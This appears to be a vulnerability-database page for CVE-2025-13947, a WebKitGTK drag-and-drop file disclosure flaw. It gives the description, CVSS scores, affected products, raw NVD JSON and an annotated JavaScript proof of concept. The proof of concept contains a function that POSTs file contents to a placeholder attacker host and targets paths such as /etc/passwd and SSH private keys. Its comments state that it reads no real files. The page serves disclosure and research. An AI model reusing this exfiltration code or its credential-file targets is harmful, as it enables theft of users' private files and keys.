Security Vulnerability Report
CVE-2025-13947 CVSS 7.4 HIGH

CVE-2025-13947

Published: 2025-12-03 10:15:48
Last Modified: 2026-04-20 13:16:10

Description

A flaw was found in WebKitGTK. This vulnerability allows remote, user-assisted information disclosure that can reveal any file the user is permitted to read via abusing the file drag-and-drop mechanism where WebKitGTK does not verify that drag operations originate from outside the browser.

CVSS Details

CVSS Score
7.4
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N

Configurations (Affected Products)

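No configuration data is available in the CVE record. The product list below does not come from that record; confirm affected and fixed versions against the vendor advisories referenced in the raw JSON data at the end of this page.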

WebKitGTK < 2.44.0
Fedora 39-40
Red Hat Enterprise Linux 8
Red Hat Enterprise Linux 9
Red Hat Enterprise Linux 7 (not affected)
Red Hat Enterprise Linux 6 (not affected)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
javascript
// CVE-2025-13947 PoC - WebKitGTK File Drag-and-Drop Information Disclosure
// Listing published alongside the advisory as an illustration of the
// drag-and-drop issue.
//
// Reviewer notes (what the listing does as written):
//  - Every File placed in a drag event is built in memory from the literal
//    string 'dummy'; the path argument only supplies the file *name*.
//  - The DragEvents are constructed and dispatched by script, so they are
//    synthetic events (isTrusted === false), not user drag operations.
//  - exploit() calls only createFakeDropEvent(). readFileViaInput() is never
//    invoked, so no drop zone or 'drop' listener is installed and exfiltrate()
//    is unreachable from the entry point. On the path that actually runs, no
//    local file content is read or sent.
//  - Do not use this script to decide whether a host is affected; compare the
//    installed WebKitGTK package against the vendor errata instead.
const maliciousPoc = {
  /**
   * Dispatch a synthetic 'dragover' followed by a synthetic 'drop' on
   * `document`, each carrying one placeholder File.
   *
   * @param {string} filePath - Path whose last '/'-separated segment is used
   *   as the name of the placeholder File. The path itself is never opened.
   */
  createFakeDropEvent(filePath) {
    const transfer = new DataTransfer();

    // In-memory File: content is the five bytes of 'dummy', nothing more.
    const pathSegments = filePath.split('/');
    const placeholderFile = new File(['dummy'], pathSegments.pop(), {
      type: 'text/plain',
    });
    transfer.items.add(placeholderFile);

    // 'dragover' is dispatched first, then 'drop', in the original's order.
    const eventInit = { bubbles: true, cancelable: true, dataTransfer: transfer };
    for (const eventType of ['dragover', 'drop']) {
      document.dispatchEvent(new DragEvent(eventType, eventInit));
    }
  },

  /**
   * Append a visible drop zone to the page whose 'drop' handler reads each
   * dropped File as text, logs it and passes it to exfiltrate().
   *
   * Not called anywhere in this listing.
   *
   * @param {string} filePath - Unused by the body.
   */
  readFileViaInput(filePath) {
    // Created and typed as a file input, then never attached or read.
    const fileInput = document.createElement('input');
    fileInput.type = 'file';

    const dropZone = document.createElement('div');
    dropZone.style.cssText = 'width:200px;height:200px;border:2px dashed #000;';
    dropZone.textContent = 'Drop file here';

    // Arrow function so `this` stays bound to maliciousPoc inside the handler.
    const handleDrop = async (dropEvent) => {
      dropEvent.preventDefault();
      dropEvent.stopPropagation();

      // Files are processed one at a time; each read is awaited before the
      // next begins.
      for (const file of dropEvent.dataTransfer.files) {
        const content = await file.text();
        console.log('File content:', content);
        this.exfiltrate(file.name, content);
      }
    };

    dropZone.addEventListener('drop', handleDrop);
    document.body.appendChild(dropZone);
  },

  /**
   * POST a JSON body of the form {filename, content} to the placeholder host
   * used by the listing.
   *
   * The request uses mode 'no-cors', so any response is opaque to the page.
   * The promise returned by fetch() is neither awaited nor given a rejection
   * handler.
   *
   * @param {string} filename - Name reported for the file.
   * @param {string} content - Text reported for the file.
   */
  exfiltrate(filename, content) {
    const payload = JSON.stringify({ filename, content });
    fetch('https://attacker-server.com/exfil', {
      method: 'POST',
      body: payload,
      mode: 'no-cors',
    });
  },

  /**
   * Entry point: run createFakeDropEvent() once per example path.
   */
  exploit() {
    // Example paths from the original listing. They are used only to name
    // the placeholder File objects; nothing here opens them.
    const targetFiles = [
      '/etc/passwd',
      '/home/user/.ssh/id_rsa',
      '/home/user/.bashrc',
      '/home/user/.config/sensitive.conf',
    ];

    for (const targetPath of targetFiles) {
      this.createFakeDropEvent(targetPath);
    }
  },
};

// Runs as soon as the script is evaluated in a page.
maliciousPoc.exploit();

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-13947", "sourceIdentifier": "[email protected]", "published": "2025-12-03T10:15:47.710", "lastModified": "2026-04-20T13:16:10.257", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw was found in WebKitGTK. This vulnerability allows remote, user-assisted information disclosure that can reveal any file the user is permitted to read via abusing the file drag-and-drop mechanism where WebKitGTK does not verify that drag operations originate from outside the browser."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N", "baseScore": 7.4, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 4.0}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-346"}]}], "references": [{"url": "https://access.redhat.com/errata/RHSA-2025:22789", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2025:22790", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2025:23110", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2025:23433", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2025:23434", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2025:23451", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2025:23452", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2025:23583", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2025:23591", "source": 
"[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2025:23742", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2025:23743", "source": "[email protected]"}, {"url": "https://access.redhat.com/security/cve/CVE-2025-13947", "source": "[email protected]"}, {"url": "https://bugs.webkit.org/show_bug.cgi?id=271957", "source": "[email protected]"}, {"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2418576", "source": "[email protected]"}]}}